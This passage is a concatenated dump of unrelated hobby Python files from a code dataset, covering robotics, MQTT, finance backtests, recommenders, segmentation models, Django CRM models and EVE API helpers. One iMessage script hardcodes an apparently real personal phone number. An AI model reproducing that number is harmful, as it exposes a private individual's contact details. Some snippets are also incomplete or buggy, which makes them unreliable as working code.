self.readuntil(\"Storage:\", max=50)\n rep = [\"\\\\x1b m\",\"\\\\x1b r\",\"\\\\x1b#\",\"\\\\x1b\",\"[25;8\",\"H[04;\",\"r[23;01HD[22;64H51231H'\"]\n if ret[0]:\n out = str(ret[1])\n for x in rep:\n out = out.replace(x,\"\")\n out = out[out.find(\"=\")+1:]\n return out\n\n def move(self, x, y, angle):\n self.send(\"SET VAR POSIT=%s,%s,0,0,0,%s\\r\\n\"%(x,y,angle),flush=True)\n","repo_name":"reverbrick/projectV","sub_path":"mpy_openmv/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27428965986","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\" \nPublish some messages to queue\n\"\"\"\nimport paho.mqtt.publish as publish\n\n\nmsgs = [{'topic': \"comandos/voz/camara\", 'payload': \"jump\"}]\n\n\nhost = \"localhost\"\n\n\nif __name__ == '__main__':\n # publish a single message\n string = {'comando': 'esquerda'}\n import json\n \n publish.single(topic=\"comandos/voz/camara\", payload= json.dumps(string), hostname=host)\n\n # publish multiple messages\n # publish.multiple(msgs, hostname=host)\n\n\n# vi: set fileencoding=utf-8 :","repo_name":"RafaelPBPinto/Gym-Home","sub_path":"Cam/mqtt_tentativa2/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"1884510779","text":"from py_imessage import imessage\n\nphone = \"4049530628\"\nmsg = \"hello\"\n\n\nguid = imessage.send(phone,\"I love you\")\n# Let the recipient read the message\nresp = imessage.status(guid)\nprint(f'Message was read at {resp.get(\"date_read\")}')","repo_name":"bc2026/coding-before-college","sub_path":"py/py_iMsg/py_iMsg.py","file_name":"py_iMsg.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19992850960","text":"import math\n\n\ndef compound_interest(principle, rate):\n # Calculates compound interest\n time = 0\n Amount = 0\n while Amount < 
max_balance:\n time += 1\n Amount = principle * (pow((1 + rate / 100), time))\n CI = Amount - principle\n\n print(time)\n return time\n\n\nmax_balance = 700000\nmin_balance = 50000\ninterest_rate = 7.1 # 7.1%\ntime = 0\nbalance = int(input())\n\nif min_balance < balance < max_balance:\n # A = P(1+(r/n)^(nt)\n # A = the future value of the investment/loan, including interest\n # P = the principal investment amount (the initial deposit or loan amount)\n # r = the annual interest rate (decimal)\n # n = the number of times that interest is compounded per unit t\n # t = the time the money is invested or borrowed for\n a = max_balance\n p = balance\n r = interest_rate\n t = 0\n # Driver Code\n time = compound_interest(p, r)\n","repo_name":"rickhaigh/python","sub_path":"Simple Banking System/Problems/Rich man's world/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74066679893","text":"import pandas as pd\nimport scipy.sparse as sparse\nfrom implicit.nearest_neighbours import bm25_weight\nfrom implicit.als import AlternatingLeastSquares\nimport numpy as np\n\n# Load your data from a CSV file (replace 'your_data.csv' with your actual file)\ndf = pd.read_csv('data.csv')\n\n# Convert 'rating' and 'userid' columns to numeric\ndf['rating'] = pd.to_numeric(df['rating'], errors='coerce')\ndf['userid'] = pd.to_numeric(df['userid'], errors='coerce')\n\n# Create mappings for user and film IDs\nuser_mapping = {user: i for i, user in enumerate(df['userid'].unique())}\nfilm_mapping = {film: i for i, film in enumerate(df['film'].unique())}\n\n# Use the mappings to create integer-based user and film IDs\ndf['userid'] = df['userid'].map(user_mapping)\ndf['film'] = df['film'].map(film_mapping)\n\n# Create a sparse matrix\nsparse_data = sparse.coo_matrix((df['rating'], (df['userid'], df['film'])))\n\n# Use the implicit library's BM25 weighting\nsparse_data = bm25_weight(sparse_data, K1=100, B=0.8)\n\n# Transpose the matrix\nuser_film_matrix = sparse_data.T.tocsr()\n\n# Create the model and fit it\nmodel = AlternatingLeastSquares(factors=64, regularization=0.05, alpha=2.0, random_state=42)\nmodel.fit(user_film_matrix)\n\nfor x in range(1, 5):\n # Choose a sample user ID for recommendations\n sample_userid = x\n\n # Get recommendations for the sample user\n ids, scores = model.recommend(sample_userid, user_film_matrix[sample_userid], N=10, filter_already_liked_items=False)\n\n # Inverse mappings to get original film names\n inverse_film_mapping = {i: film for film, i in film_mapping.items()}\n result = pd.DataFrame({\"film\": [inverse_film_mapping.get(i, 'Unknown') for i in ids], \"score\": scores})\n\n print(result)\n","repo_name":"lewisblackburn/sample_recommendation_system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41487957769","text":"#!/usr/bin/env python3\n\nperTable = open('periodic_table.txt')\nam = {} # Dictionary going from atomic symbols to masses\nfor i in perTable:\n if i:\n line = i.split(',')\n atomicSymbol = line[-1][:-1] #[:-1] to shred off the \\n\n atomicMass = float(line[1])\n am[atomicSymbol] = atomicMass\nperTable.close()\nprint(\"Sample input: 'H 2 O 13.2' for 13.2 grams of H2O\")\nprint(\"Ctrl + c to stop the program.\")\nwhile(True):\n question = input().split(' ')\n # Time to parse the input!\n elements = []\n 
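# --- illustrative helper (not in the original script): the same 'element count'\n    # tokenization as a pure function; the name parse_formula and its example are\n    # assumptions added for clarity.\n    # e.g. parse_formula(['H', '2', 'O']) -> [('H', 2), ('O', 1)]\n    def parse_formula(tokens):\n        pairs = []\n        i = 0\n        while i < len(tokens):\n            sym = tokens[i]\n            # an all-digit token following a symbol is its count; otherwise assume 1\n            if i + 1 < len(tokens) and tokens[i + 1].isdigit():\n                count = int(tokens[i + 1])\n                i += 1\n            else:\n                count = 1\n            pairs.append((sym, count))\n            i += 1\n        return pairs\n\n    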
numbers = []\n m = float(question[-1]) # last thing is _always_ the mass\n question = question[:-1] #lose the mass\n i = 0 # we'll do a manual for loop, while-style\n while i < len(question):\n element = question[i]\n #get an element and check if the thing after 1) exists and 2) is a number\n if i < len(question) - 1 and question[i + 1].isdigit():\n number = question[i + 1]\n # if it does, we skip the next thing because it's a number\n i += 1\n else:\n #otherwise assume 1\n number = 1\n elements.append(element)\n numbers.append(number)\n i += 1\n numFirst = 0\n M = 0\n i = 0\n while i nav:\n mnt_inv = min(prev_inv + increment, max_inv)\n else:\n mnt_inv = max(prev_inv - increment, min_inv)\n return mnt_inv\n\ndef is_cashflow_missing(cashflows):\n if len(cashflows) == 0:\n return True\n \n for c in cashflows:\n (date, cf) = c\n if cf == 0:\n return True\n \n return False\n \ndef run(nav_file, ma_type):\n nav_data = common.read_from_file(nav_file)\n fund_names = nav_data[0].split(',')[1:]\n del nav_data[1:7]\n ma_data = get_ma_data(nav_data)\n del nav_data[0:7]\n \n cashflows = common.init_array_dict(fund_names)\n fund_inv_dict = common.init_dict(fund_names)\n fund_corpus_dict = common.init_dict(fund_names)\n fund_corpus_index_dict = common.init_array_dict(fund_names)\n last_inv_dict = common.init_dict(fund_names, default_inv)\n returns_halfyr = common.init_array_dict(fund_names)\n returns_annual = common.init_array_dict(fund_names)\n units_dict_halfyr = common.init_dict(fund_names)\n units_dict_annual = common.init_dict(fund_names)\n units_dict_overall = common.init_dict(fund_names)\n \n cnt = len(nav_data)\n max_total_inv = default_inv * (cnt - 1)\n for i in xrange(0, cnt):\n \n row_data = nav_data[i].split(',')\n dt = datetime.strptime(row_data[0], '%d-%m-%Y')\n fund_nav = row_data[1:]\n fund_nav_dict = common.get_fund_nav_dict(fund_names, fund_nav)\n \n # half-yearly returns for each fund\n if i % 6 == 0 and i > 0:\n \n wealth = common.get_fund_wealth(fund_nav_dict, units_dict_halfyr)\n for fund in fund_names:\n start_corpus = fund_corpus_index_dict[fund][i-7]\n end_corpus = fund_corpus_index_dict[fund][i-1]\n corpus_wealth = end_corpus - start_corpus\n total_wealth = wealth[fund] + corpus_wealth\n \n cashflows_halfyr = cashflows[fund][i-6:i] # slice last 6 months cashflows\n if is_cashflow_missing(cashflows_halfyr):\n continue\n \n cf = (dt, total_wealth)\n cashflows_halfyr.append(cf)\n ret = common.xirr(cashflows_halfyr)\n returns_halfyr[fund].append(ret)\n\n # clean up\n units_dict_halfyr = common.init_dict(fund_names)\n\n # annual returns for each fund\n if i % 12 == 0 and i > 0:\n \n wealth = common.get_fund_wealth(fund_nav_dict, units_dict_annual)\n for fund in fund_names:\n start_corpus = fund_corpus_index_dict[fund][i-13]\n end_corpus = fund_corpus_index_dict[fund][i-1]\n corpus_wealth = end_corpus - start_corpus\n total_wealth = wealth[fund] + corpus_wealth\n \n cashflows_annual = cashflows[fund][i-12:i] # slice last 12 months cashflows\n if is_cashflow_missing(cashflows_annual):\n continue\n \n cf = (dt, wealth[fund] + fund_corpus_dict[fund])\n cashflows_annual.append(cf)\n ret = common.xirr(cashflows_annual)\n returns_annual[fund].append(ret)\n\n # clean up\n units_dict_annual = common.init_dict(fund_names)\n \n # no investment on the last date\n if i == cnt - 1:\n break\n \n for f in fund_names:\n \n # cap total investment\n allowed_inv = max_total_inv - fund_inv_dict[f]\n \n prev_inv = last_inv_dict[f]\n nav = fund_nav_dict[f]\n ma = ma_data[f][i]\n \n # equity investment\n 
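# note: get_mnt_inv (above) nudges the monthly equity instalment up or down\n            # by a fixed increment according to where the fund NAV sits relative to\n            # its moving average, clamped to [min_inv, max_inv]; whatever differs\n            # from the default monthly budget is absorbed by the debt corpus below.\n            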
mnt_inv = get_mnt_inv(ma_type, prev_inv, nav, ma)\n mnt_inv = min(mnt_inv, allowed_inv)\n last_inv_dict[f] = mnt_inv\n allowed_inv -= mnt_inv\n \n # debt investment\n corpus = fund_corpus_dict[f]\n debt_inv = default_inv - mnt_inv\n if debt_inv < 0:\n debt_inv = -min(mnt_inv - default_inv, corpus)\n else:\n debt_inv = min(debt_inv, allowed_inv)\n \n # corpus investment + interest\n corpus += debt_inv\n interest = corpus * int_rate\n corpus += interest\n fund_corpus_dict[f] = corpus\n fund_corpus_index_dict[f].append(corpus)\n \n # total investment\n total_inv = mnt_inv + debt_inv\n fund_inv_dict[f] += total_inv\n\n # invested units\n units = mnt_inv / nav\n units_dict_overall[f] += units\n units_dict_halfyr[f] += units\n units_dict_annual[f] += units\n\n # cashflows\n cf = (dt, -total_inv)\n cashflows[f].append(cf)\n\n # debugging\n # if f == 'Birla_Advantage_Fund':\n # print '%d\\t%d\\t%d\\t%.2f\\t%d\\t%d' % (mnt_inv, debt_inv, round(fund_inv_dict[f]), units, -total_inv, round(corpus))\n\n file_data = []\n \n header_line = \\\n 'Fund,Investment,Wealth,Absolute Return,Annualized Return,' + \\\n 'Half-Yr Return Mean,Half-Yr Return Std Dev,Half-Yr Sharpe,' + \\\n 'Annual Return Mean,Annual Return Std Dev,Annual Sharpe'\n file_data.append(header_line)\n \n # final wealth\n nav_line = nav_data[cnt - 1].split(',')[1:]\n fund_nav_dict = common.get_fund_nav_dict(fund_names, nav_line)\n wealth = common.get_fund_wealth(fund_nav_dict, units_dict_overall)\n\n # performance stats for each fund\n last_date = nav_data[cnt - 1].split(',')[0]\n dt = datetime.strptime(last_date, '%d-%m-%Y')\n for fund in sorted(fund_names): \n total_wealth = wealth[fund] + fund_corpus_dict[fund]\n fund_cashflows = cashflows[fund][:]\n cf = (dt, total_wealth)\n fund_cashflows.append(cf)\n \n fund_inv = fund_inv_dict[fund]\n abs_return = ((total_wealth / fund_inv) - 1)\n ann_return = common.xirr(fund_cashflows)\n \n hfr = returns_halfyr[fund]\n halfyr_rf_rate = common.get_rf_rate('half-yearly')\n halfyr_return_mean = numpy.mean(hfr)\n halfyr_return_std = numpy.std(hfr)\n halfyr_sharpe = common.get_sharpe_ratio(hfr, halfyr_rf_rate)\n\n afr = returns_annual[fund]\n annual_rf_rate = common.get_rf_rate('annual')\n annual_return_mean = numpy.mean(afr)\n annual_return_std = numpy.std(afr)\n annual_sharpe = common.get_sharpe_ratio(afr, annual_rf_rate)\n \n line_data = \\\n fund + ',' + str(fund_inv) + ',' + str(total_wealth) + ',' + \\\n str(abs_return) + ',' + str(ann_return) + ',' + \\\n str(halfyr_return_mean) + ',' + str(halfyr_return_std) + ',' + \\\n str(halfyr_sharpe) + ',' + str(annual_return_mean) + ',' + \\\n str(annual_return_std) + ',' + str(annual_sharpe)\n file_data.append(line_data)\n \n ma_file_name = 'ma_with_debt_' + ma_type + '.csv'\n ma_file = os.path.join(data_dir, ma_file_name)\n common.write_to_file(ma_file, file_data)\n \ndef main():\n script, nav_file, ma_type = sys.argv\n run(nav_file, ma_type)\n pass\n \nif __name__ == '__main__':\n main()","repo_name":"justchells/FinProj","sub_path":"V1/ma_with_debt.py","file_name":"ma_with_debt.py","file_ext":"py","file_size_in_byte":7478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72937491734","text":"import torch\nimport numpy as np\nimport torch.nn as nn\nfrom SegModel.UNet import UNet\n\nfrom PreProcess.DistanceMapNumpy import DistanceMap\n\n\ndevice = torch.device('cuda:1' if torch.cuda.is_available() else 'cpu')\nclass TwoUNet(nn.Module):\n def __init__(self, in_channels, out_channels, 
filters=32):\n        super(TwoUNet, self).__init__()\n        self.unet1 = UNet(in_channels, out_channels-2, filters=filters)\n        self.unet2 = UNet(in_channels, out_channels, filters=filters)\n\n    def forward(self, x, epoch):\n\n        if epoch > 10:\n            out1 = self.unet1(x)\n\n            out1_copy = out1[:, 2, ...].cpu().data.numpy()\n            dis_map_list = []\n            for batch in range(out1_copy.shape[0]):\n                dis_map_list.append(DistanceMap(out1_copy[batch, ...]))\n            dis_map = np.array(dis_map_list)\n            dis_map = dis_map[:, np.newaxis, ...]\n            dis_map = torch.from_numpy(dis_map).to(device)\n            assert dis_map.shape == x.shape\n\n            out2 = self.unet2(dis_map*x)\n\n            return out1, out2\n        else:\n            out1 = self.unet1(x)\n            return out1","repo_name":"Cherishzyh/ProstateXSeg","sub_path":"SegModel/TwoUNet.py","file_name":"TwoUNet.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"}
{"seq_id":"16619104146","text":"#!/usr/bin/env python3\n# from typing import *\n\nimport sys\nfrom collections import defaultdict\n\nsys.setrecursionlimit(10 ** 8)\n\nif not __debug__:\n    from icecream import ic\n    def debug(*x): ic(x)\nelse:\n    def debug(*x): pass\n\n# def solve(N: int, M: int, p: List[int], x: List[int], y: List[int]) -> int:\n\n\ndef solve(N, M, p, X, Y):\n    CHILD = \"child\"\n    CHECK = \"check\"\n    person_data = {i+1: {CHILD: set(), CHECK: False} for i in range(N)}\n    insurance = defaultdict(int)\n\n    ans = 0\n\n    for i, v in enumerate(p, 2):\n        person_data[v][CHILD].add(i)\n\n    for x, y in zip(X, Y):\n        insurance[x] = max(insurance[x], y)\n\n    def __solve(person_id, depth):\n        if depth > 0:\n            person_data[person_id][CHECK] = True\n\n        for child_id in person_data[person_id][CHILD]:\n            person_data[child_id][CHECK] = True\n            debug(person_data[person_id], person_data[child_id])\n            __solve(child_id, depth-1)\n\n    debug(person_data, insurance)\n\n    for k, v in insurance.items():\n        __solve(k, v)\n\n    debug(person_data)\n\n    for v in person_data.values():\n        ans += 1 if v[CHECK] else 0\n\n    return ans\n\n\ndef solve2(N, M, P, X, Y):\n    dp = [-1 for _ in range(N)]\n    ans = 0\n\n    # for x, y in zip(X, Y):\n    #     dp[x] = max(dp[x], y)\n    # debug(dp, P)\n    # for i in range(1, N):\n    #     dp[i] = max(dp[i], dp[P[i]]-1)\n\n    for v in dp:\n        ans += v >= 0\n\n    return ans\n\n\n# generated by oj-template v4.8.1 (https://github.com/online-judge-tools/template-generator)\n\n\ndef main():\n    import sys\n    tokens = iter(sys.stdin.read().split())\n    N = int(next(tokens))\n    M = int(next(tokens))\n    p = [None for _ in range(N - 1)]\n    x = [None for _ in range(M)]\n    y = [None for _ in range(M)]\n    for i in range(N - 1):\n        p[i] = int(next(tokens)) - 1\n    for i in range(M):\n        x[i] = int(next(tokens)) - 1\n        y[i] = int(next(tokens))\n    assert next(tokens, None) is None\n    a = solve2(N, M, p, x, y)\n    print(a)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"newbie1111/Programming-Contests","sub_path":"atcoder.jp/abc309/abc309_e/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
{"seq_id":"20321614831","text":"import os\nfrom django.db import models\nfrom django.utils.crypto import get_random_string\nfrom .constants import BUSINESS_ROLES, OFFICE_TYPES\nfrom stdimage.models import StdImageField\nfrom remark.lib.tokens import public_id\n\n\ndef bus_public_id():\n    \"\"\"Public identifier for a business.\"\"\"\n    return public_id(\"bus\")\n\n\ndef peep_public_id():\n    \"\"\"Public identifier for a person.\"\"\"\n    return 
public_id(\"peep\")\n\n\ndef off_public_id():\n \"\"\"Public identifier for a business.\"\"\"\n return public_id(\"off\")\n\n\ndef avatar_media_path(person, filename):\n \"\"\"\n Given a User instance, and the filename as supplied during upload,\n determine where the uploaded avatar image should actually be placed.\n\n See https://docs.djangoproject.com/en/2.1/ref/models/fields/#filefield\n\n Note: Thumbnail generation works fine on FileSystemStorage, but not on S3.\n To overcome this known issue, append random 7-char string to end of file name.\n Though, old files will not be deleted from S3 on image replacement.\n\n person//avatar_<.ext>\n person//avatar_.regular<.ext>\n person//avatar_.thumbnail<.ext>\n \"\"\"\n _, extension = os.path.splitext(filename)\n random_str = get_random_string(length=7)\n return f\"person/{person.public_id}/avatar_{random_str}{extension}\"\n\n\nclass Business(models.Model):\n public_id = models.CharField(\n primary_key=True,\n default=bus_public_id,\n help_text=\"A unique identifier for this business that is safe to share publicly.\",\n max_length=24,\n editable=False,\n )\n\n name = models.CharField(max_length=255, blank=False, help_text=\"Business Name\")\n\n is_property_owner = models.BooleanField(\n default=False, help_text=\"Business Type is Property Owner\"\n )\n\n is_asset_manager = models.BooleanField(\n default=False, help_text=\"Business Type is Asset Manager\"\n )\n\n is_property_manager = models.BooleanField(\n default=False, help_text=\"Business Type is Property Manager\"\n )\n\n is_remarkably = models.BooleanField(\n default=False, help_text=\"Business Type is Remarkably\"\n )\n\n is_developer = models.BooleanField(\n default=False, help_text=\"Business Type is Developer\"\n )\n \n def get_roles(self):\n roles = []\n for k in BUSINESS_ROLES:\n if getattr(self, k, None):\n roles.append(BUSINESS_ROLES[k])\n return roles\n\n is_investor = models.BooleanField(\n default=False, help_text=\"Business Type is JV / Investor\"\n )\n\n is_vendor = models.BooleanField(\n default=False, help_text=\"Business Type is Vendor / Consultant\"\n )\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"Businesses\"\n\n\nclass OfficeManager(models.Manager):\n pass\n\n\nclass Office(models.Model):\n public_id = models.CharField(\n primary_key=True,\n default=off_public_id,\n help_text=\"A unique identifier for this person that is safe to share publicly.\",\n max_length=24,\n editable=False,\n )\n\n is_home_office = models.BooleanField(default=False, help_text=\"Is the home office?\")\n\n name = models.CharField(\n default=\"\", max_length=255, null=True, blank=False, help_text=\"Office Name\"\n )\n\n address = models.ForeignKey(\n \"geo.Address\", on_delete=models.CASCADE, null=True, blank=False, help_text=\"Address\"\n )\n\n business = models.ForeignKey(\n \"crm.Business\", on_delete=models.CASCADE, null=True, blank=False, help_text=\"Business\"\n )\n\n office_type = models.IntegerField(\n choices=OFFICE_TYPES, help_text=\"Office Type\", blank=True, null=True\n )\n\n objects = OfficeManager()\n\n def __str__(self):\n if self.business:\n s = \"{}: {} ({})\".format(self.business.name, self.name, self.public_id)\n else:\n s = \"{} ({})\".format(self.name, self.public_id)\n return s\n\n\nclass PeopleManager(models.Manager):\n pass\n\n\nclass Person(models.Model):\n public_id = models.CharField(\n primary_key=True,\n default=peep_public_id,\n help_text=\"A unique identifier for this person that is safe to share publicly.\",\n max_length=24,\n 
editable=False,\n )\n\n first_name = models.CharField(max_length=255, blank=False, help_text=\"First Name\")\n\n last_name = models.CharField(max_length=255, blank=False, help_text=\"Last Name\")\n\n # xxx May want to restrict input on this in the future\n role = models.CharField(max_length=255, blank=False, help_text=\"Job Role\")\n\n email = models.CharField(max_length=255, blank=False, help_text=\"Email\")\n\n office_phone_country_code = models.CharField(max_length=5, blank=True, help_text=\"Office phone country code\")\n\n office_phone = models.CharField(\n max_length=255, blank=True, help_text=\"Office Phone\"\n )\n\n office_phone_ext = models.CharField(max_length=255, blank=True, help_text=\"Phone extension\")\n\n # cell_phone = models.CharField(max_length=255, blank=True, help_text=\"Cell Phone\")\n\n office = models.ForeignKey(\n \"crm.Office\",\n on_delete=models.CASCADE,\n null=True,\n blank=False,\n help_text=\"Office the person works at\",\n )\n\n user = models.OneToOneField(\n \"users.User\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n help_text=\"User associated with this person\",\n )\n\n avatar = StdImageField(\n null=True,\n blank=True,\n default=\"\",\n upload_to=avatar_media_path,\n help_text=\"\"\"A full-resolution user avatar.
Resized variants (100x100, 36x36) will also be created on Amazon S3.\"\"\",\n variations={\"regular\": (100, 100, True), \"thumbnail\": (36, 36, True)},\n )\n\n objects = PeopleManager()\n\n @property\n def full_name(self):\n return f\"{self.first_name} {self.last_name}\"\n\n def __str__(self):\n if self.office:\n s = \"{}: {} {} ({})\".format(\n self.office.business.name, self.first_name, self.last_name, self.public_id\n )\n else:\n s = \"{} {} ({})\".format(\n self.first_name, self.last_name, self.public_id\n )\n return s\n","repo_name":"konaindev/React-Django","sub_path":"remark/crm/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36681059584","text":"#!/usr/bin/env python3\nimport numpy as np\n\n\nclass Action:\n \"\"\"Robot action.\n\n The length of the attributes depends on the robot type. In the following\n ``n_joints`` is the number of joints and ``n_fingers`` the number of\n fingers (e.g. for the TriFinger robots ``n_fingers = 3, n_joints = 9``).\n\n Attributes:\n torque (array, shape=(n_joints,)): Torque commands for the joints.\n position (array, shape=(n_joints,)): Position commands for the joints.\n Set to NaN to disable position control for the corresponding joint.\n kp (array, shape=(n_joints,)): P-gain for position controller. Set to\n NaN to use default gain for the corresponding joint.\n kd (array, shape=(n_joints,)): D-gain for position controller. Set to\n NaN to use default gain for the corresponding joint.\n \"\"\"\n\n def __init__(self, torque, position, kp=None, kd=None):\n \"\"\"Initialize\n\n Args:\n torque: See :attr:`torque`.\n position: See :attr:`position`.\n kp: See :attr:`kp`.\n kd: See :attr:`kd`.\n \"\"\"\n self.torque = np.asarray(torque)\n self.position = np.asarray(position)\n\n if kp is None:\n self.position_kp = np.full_like(position, np.nan, dtype=float)\n else:\n self.position_kp = kp\n\n if kd is None:\n self.position_kd = np.full_like(position, np.nan, dtype=float)\n else:\n self.position_kd = kd\n","repo_name":"rr-learning/rrc_simulation","sub_path":"python/rrc_simulation/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"67"} +{"seq_id":"16967079782","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport csv\n\n\ndef plot_single_multiple_run(results):\n \n plt.subplots(figsize=(15,15))\n plt.subplot(3,3,1)\n plt.title('Position of Quadcopter')\n plt.plot(results['time'], results['x'], label='x')\n plt.plot(results['time'], results['y'], label='y')\n plt.plot(results['time'], results['z'], label='z')\n plt.title(\"Position (z --> 0)\")\n plt.xlabel('Time, seconds')\n plt.ylabel('Position')\n plt.grid(True)\n plt.legend()\n \n plt.subplot(3,3,2)\n plt.title('Velocity of Quadcopter')\n plt.plot(results['time'], results['x_velocity'], label='x_hat')\n plt.plot(results['time'], results['y_velocity'], label='y_hat')\n plt.plot(results['time'], results['z_velocity'], label='z_hat')\n plt.title(\"Velocities (|v| --> small)\")\n plt.xlabel('Time, seconds')\n plt.ylabel('Velocity')\n plt.grid(True)\n plt.legend()\n\n plt.subplot(3,3,3)\n plt.title('Euler angles')\n plt.plot(results['time'], normalize_angle(results['phi']), label='phi')\n plt.plot(results['time'], normalize_angle(results['theta']), label='theta')\n plt.plot(results['time'], 
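# phi/theta/psi are wrapped into [-pi, pi] by normalize_angle (defined at\n             # the bottom of this module) so the traces do not jump at the wrap-around\n             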
normalize_angle(results['psi']), label='psi')\n plt.title(\"Orientation \")\n plt.xlabel('Time, seconds')\n plt.grid(True)\n plt.legend()\n\n plt.subplot(3,3,4)\n plt.title('Angular Velocity')\n plt.plot(results['time'], results['phi_velocity'], label='phi_velocity')\n plt.plot(results['time'], results['theta_velocity'], label='theta_velocity')\n plt.plot(results['time'], results['psi_velocity'], label='psi_velocity')\n plt.xlabel('Time, seconds')\n plt.grid(True)\n plt.legend()\n \n plt.subplot(3, 3, 5)\n plt.title('Rotor Speed')\n plt.plot(results['time'], results['rotor_speed1'], label='Rotor 1')\n plt.plot(results['time'], results['rotor_speed2'], label='Rotor 2')\n plt.plot(results['time'], results['rotor_speed3'], label='Rotor 3')\n plt.plot(results['time'], results['rotor_speed4'], label='Rotor 4')\n plt.xlabel('Time, seconds')\n plt.ylabel('Rotor Speed, revolutions / second')\n plt.grid(True)\n plt.legend()\n\n plt.subplot(3, 3, 6)\n plt.title('Reward')\n plt.plot(results['time'], results['reward'], label='Reward')\n plt.xlabel('Time, seconds')\n plt.ylabel('Reward')\n plt.show()\n return plt\n\ndef plot_lastdata(results,numofepisode):\n\n plt.figure(figsize=(15,10))\n plt.subplot(2,2,1)\n plt.plot(results['episode'], results['reward'])\n plt.xlabel('No of episodes')\n plt.ylabel('Rewards ')\n plt.xlim(xmin=0,xmax=np.max(results['episode'])+2)\n plt.title(\"Rewards per episode\")\n\n plt.subplot(2,2,2)\n plt.plot(results['episode'][-numofepisode:], results['reward'][-numofepisode:])\n plt.xlabel('No of episodes')\n plt.ylabel('Rewards ')\n plt.xlim(xmin=np.max(results['episode'])-20,xmax=np.max(results['episode'])+2)\n plt.ylim(ymin=0,ymax=np.max(results['reward'])+2)\n plt.title(\"Reward for last 10 episodes\")\n plt.show()\n\n return plt\n\ndef normalize_angle(angles):\n # Adjust angles to range -pi to pi\n norm_angles = np.copy(angles)\n for i in range(len(norm_angles)):\n while norm_angles[i] > np.pi:\n norm_angles[i] -= 2 * np.pi\n return norm_angles\n","repo_name":"kavichan/Quadcopter_project","sub_path":"graphutil.py","file_name":"graphutil.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1183929938","text":"import random\r\nimport string\r\nimport requests\r\nimport datetime\r\nimport base64\r\nimport json\r\nimport os\r\n\r\n### Global variables\r\nbase_api = \"https://esi.evetech.net/dev/\"\r\n\r\nseat_client_id = os.environ['SEAT_CLIENT_ID']\r\nseat_client_secret = os.environ['SEAT_CLIENT_SECRET']\r\n\r\nclient_id = os.environ['CLIENT_ID']\r\nclient_secret = os.environ['CLIENT_SECRET']\r\n\r\ndef gen_random_string(length):\r\n\r\n return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(length))\r\n\r\n#######################\r\n## Private Functions ##\r\n#######################\r\n\r\ndef get_format_from_raw(raw, cursor):\r\n result = [dict(line) for line in [zip([column[0] for column in cursor.description], row) for row in raw]][0]\r\n return result\r\n\r\ndef get_format_from_raw_full(raw, cursor):\r\n result = [dict(line) for line in [zip([column[0] for column in cursor.description], row) for row in raw]]\r\n return result\r\n\r\ndef date_to_string(datetime):\r\n output = datetime.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n return output\r\n\r\n\r\n### Function for making a call to an API ###\r\ndef api_call_get(endpoint, data):\r\n path = base_api + endpoint\r\n\r\n\r\n # Converting the data set into GET url\r\n data_string = \"?\"\r\n for 
entry in data:\r\n data_string = data_string + str(entry) + \"=\" + str(data[entry]) + '&'\r\n\r\n # Appending to path\r\n path = path + data_string\r\n path = path[0:len(path) - 1]\r\n bearer = {'Authorization': 'Bearer ' + data['token']}\r\n\r\n print(\"Sending request to \" + str(path) + \" with data of \" + str(data) + \" and header of \" + str(bearer))\r\n\r\n response = requests.get(path, data=\"\", headers=bearer)\r\n\r\n return response\r\n\r\n### Converting all instances of datetime into a string for output purposes\r\n### Requires an array as input\r\ndef encode_datetime(result):\r\n\r\n # Performing format fix\r\n new_result_output = []\r\n for value in result:\r\n\r\n ### Building the new output value\r\n new_value = value\r\n\r\n for element in value:\r\n data = value[element]\r\n if isinstance(data, datetime.datetime):\r\n\r\n new_value[element] = date_to_string(value[element])\r\n\r\n new_result_output.append(new_value)\r\n\r\n return new_result_output\r\n\r\ndef manual_request():\r\n\r\n print(\"Performing manual api request\")\r\n return str(manual_request_location())\r\n\r\ndef manual_request_access_token():\r\n\r\n ### Attempting to perform a manual access token call from a refresh token...\r\n refresh_token = 